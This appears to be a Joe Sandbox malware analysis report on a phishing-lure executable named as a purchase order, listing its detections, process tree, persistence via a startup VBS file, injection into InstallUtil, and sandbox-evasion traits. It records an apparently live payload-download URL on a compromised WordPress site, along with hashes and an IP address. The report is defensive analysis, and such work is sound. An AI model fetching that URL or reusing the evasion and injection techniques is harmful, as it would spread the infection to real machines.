Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order A2409002.scr.exe

Overview

General Information

Sample name:Purchase Order A2409002.scr.exe
Analysis ID:1586498
MD5:c6f7275a080d01719b1772fa6e33d4c8
SHA1:3416cf2f8cbf4e4c201b15b4463a09f24fa38973
SHA256:99f4980053d86704d597e388971eda5fdedd4c64b9b9adc8dd905a815be4e8a9
Tags:exescruser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Purchase Order A2409002.scr.exe (PID: 5328 cmdline: "C:\Users\user\Desktop\Purchase Order A2409002.scr.exe" MD5: C6F7275A080D01719B1772FA6E33D4C8)
    • cmd.exe (PID: 3260 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 1404 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
    • InstallUtil.exe (PID: 3412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • WerFault.exe (PID: 5808 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 1144 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • cmd.exe (PID: 424 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 5632 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.2345240998.0000000006EA0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.2324411539.00000000031FD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000000.00000002.2332483290.00000000042A9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Process Memory Space: Purchase Order A2409002.scr.exe PID: 5328JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            0.2.Purchase Order A2409002.scr.exe.6ea0000.11.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.Purchase Order A2409002.scr.exe.4c1f978.1.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.Purchase Order A2409002.scr.exe.4c1f978.1.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.Purchase Order A2409002.scr.exe.6ea0000.11.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    0.2.Purchase Order A2409002.scr.exe.45a89c8.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 2 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order A2409002.scr.exe", ParentImage: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe, ParentProcessId: 5328, ParentProcessName: Purchase Order A2409002.scr.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, ProcessId: 3260, ProcessName: cmd.exe
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order A2409002.scr.exe", ParentImage: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe, ParentProcessId: 5328, ParentProcessName: Purchase Order A2409002.scr.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release, ProcessId: 3260, ProcessName: cmd.exe

                      Data Obfuscation

                      barindex
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Purchase Order A2409002.scr.exe, ProcessId: 5328, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InheritanceFlags.vbs
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: Purchase Order A2409002.scr.exeAvira: detected
                      Source: https://www.new.eventawardsrussia.com/wp-includes/Cgntbjy.vdfAvira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Roaming\InheritanceFlags.exeAvira: detection malicious, Label: HEUR/AGEN.1308518
                      Source: C:\Users\user\AppData\Roaming\InheritanceFlags.exeReversingLabs: Detection: 68%
                      Source: Purchase Order A2409002.scr.exeReversingLabs: Detection: 68%
                      Source: Purchase Order A2409002.scr.exeVirustotal: Detection: 62%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\InheritanceFlags.exeJoe Sandbox ML: detected
                      Source: Purchase Order A2409002.scr.exeJoe Sandbox ML: detected
                      Source: Purchase Order A2409002.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 5.23.51.54:443 -> 192.168.2.6:49709 version: TLS 1.2
                      Source: Purchase Order A2409002.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.000000000075A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\InstallUtil.pdbfF source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.000000000075A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Osymbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000005.00000002.3358284879.00000000004F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346719840.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: ((.pdb source: InstallUtil.exe, 00000005.00000002.3358284879.00000000004F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbm. source: InstallUtil.exe, 00000005.00000002.3358688825.0000000000703000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdbo source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Purchase Order A2409002.scr.exe, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004E57000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346719840.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000005.00000002.3358284879.00000000004F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDBp; source: InstallUtil.exe, 00000005.00000002.3358688825.0000000000703000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdbW source: InstallUtil.exe, 00000005.00000002.3358688825.000000000075A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.000000000075A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb3D source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdbrs source: InstallUtil.exe, 00000005.00000002.3358688825.0000000000703000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: oHP<o8C:\Windows\InstallUtil.pdb- source: InstallUtil.exe, 00000005.00000002.3358284879.00000000004F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: @Ho.pdb source: InstallUtil.exe, 00000005.00000002.3358284879.00000000004F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: fX&rC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.0000000000703000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000005.00000002.3358688825.00000000006A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ?HoC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000005.00000002.3358284879.00000000004F8000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 06E9A97Dh0_2_06E9A68A
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 06E9A97Dh0_2_06E9A659
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 06E9A97Dh0_2_06E9A63C
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 06E9A97Dh0_2_06E9A7A0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 06E9A97Dh0_2_06E9A5C8
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 06E9A97Dh0_2_06E9A5D8
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 06E9A97Dh0_2_06E9AA82
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 06E9A97Dh0_2_06E9ABC7
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 06E9A97Dh0_2_06E9AB7C
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 06E9A97Dh0_2_06E9AB41
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 06E9A97Dh0_2_06E9A8B4
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 06E9A97Dh0_2_06E9A833
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 0703D828h0_2_0703D7A0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 0703D828h0_2_0703D792
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 0703D08Fh0_2_0703D020
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 0703D08Fh0_2_0703D030
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 0719EFC4h0_2_0719F0D1
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 0719EFC4h0_2_0719EDB0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 4x nop then jmp 0719EFC4h0_2_0719EDC0
                      Source: Joe Sandbox ViewIP Address: 5.23.51.54 5.23.51.54
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: global trafficHTTP traffic detected: GET /wp-includes/Cgntbjy.vdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.new.eventawardsrussia.comConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /wp-includes/Cgntbjy.vdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.new.eventawardsrussia.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: www.new.eventawardsrussia.com
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2324411539.00000000031B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2324411539.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004C1F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2346044991.0000000006FE0000.00000004.08000000.00040000.00000000.sdmp, Purchase Order A2409002.scr.exe, 00000000.00000002.2332483290.0000000004D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: Purchase Order A2409002.scr.exe, 00000000.00000002.2324411539.00000000031B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.new.eventawardsrussia.com
                      Source: Purchase Order A2409002.scr.exe, InheritanceFlags.exe.0.drString found in binary or memory: https://www.new.eventawardsrussia.com/wp-includes/Cgntbjy.vdf
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownHTTPS traffic detected: 5.23.51.54:443 -> 192.168.2.6:49709 version: TLS 1.2

                      System Summary

                      barindex
                      Source: initial sampleStatic PE information: Filename: Purchase Order A2409002.scr.exe
                      Source: Purchase Order A2409002.scr.exeStatic file information: Suspicious name
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_071F2FC0 NtResumeThread,0_2_071F2FC0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_071A6E5B0_2_071A6E5B
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_02F876000_2_02F87600
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_02F823480_2_02F82348
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_02F823380_2_02F82338
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_02F82CD80_2_02F82CD8
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_02F82CC90_2_02F82CC9
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_0618C0A00_2_0618C0A0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_0618C0910_2_0618C091
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_061840B00_2_061840B0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_061840A00_2_061840A0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06185E180_2_06185E18
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06185E090_2_06185E09
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06185D650_2_06185D65
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_0618E8D80_2_0618E8D8
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_0618E8C70_2_0618E8C7
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D3CFD80_2_06D3CFD8
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D34CC80_2_06D34CC8
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D38A1B0_2_06D38A1B
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D3F2000_2_06D3F200
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D370A90_2_06D370A9
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D34CB90_2_06D34CB9
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D314100_2_06D31410
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D314200_2_06D31420
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D624900_2_06D62490
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D624550_2_06D62455
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D703900_2_06D70390
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D703A00_2_06D703A0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D7E7500_2_06D7E750
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D703490_2_06D70349
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D76F380_2_06D76F38
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D780D60_2_06D780D6
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D7E4F80_2_06D7E4F8
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D768800_2_06D76880
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06D768710_2_06D76871
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06E933580_2_06E93358
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06E919D00_2_06E919D0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06E915800_2_06E91580
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06E915700_2_06E91570
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06E9BBD50_2_06E9BBD5
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06E933480_2_06E93348
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06E900270_2_06E90027
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06E919C00_2_06E919C0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC64CA0_2_06FC64CA
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FCDCC00_2_06FCDCC0
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC9AA80_2_06FC9AA8
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC78C80_2_06FC78C8
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FCF2B80_2_06FCF2B8
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC63680_2_06FC6368
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC63580_2_06FC6358
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC00400_2_06FC0040
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC00170_2_06FC0017
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FCDFE70_2_06FCDFE7
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC1F7B0_2_06FC1F7B
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FC78B90_2_06FC78B9
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FCA8280_2_06FCA828
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_06FCA8190_2_06FCA819
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_0703C6800_2_0703C680
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_0703C6900_2_0703C690
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_070399A50_2_070399A5
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_071953300_2_07195330
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_071933400_2_07193340
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_071993600_2_07199360
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_07198A900_2_07198A90
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_071987480_2_07198748
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_071917D90_2_071917D9
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_071917CE0_2_071917CE
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_0719332F0_2_0719332F
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_071953200_2_07195320
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_071918250_2_07191825
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_0725FA080_2_0725FA08
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_0725E5400_2_0725E540
                      Source: C:\Users\user\Desktop\Purchase Order A2409002.scr.exeCode function: 0_2_072400060_2_07240006
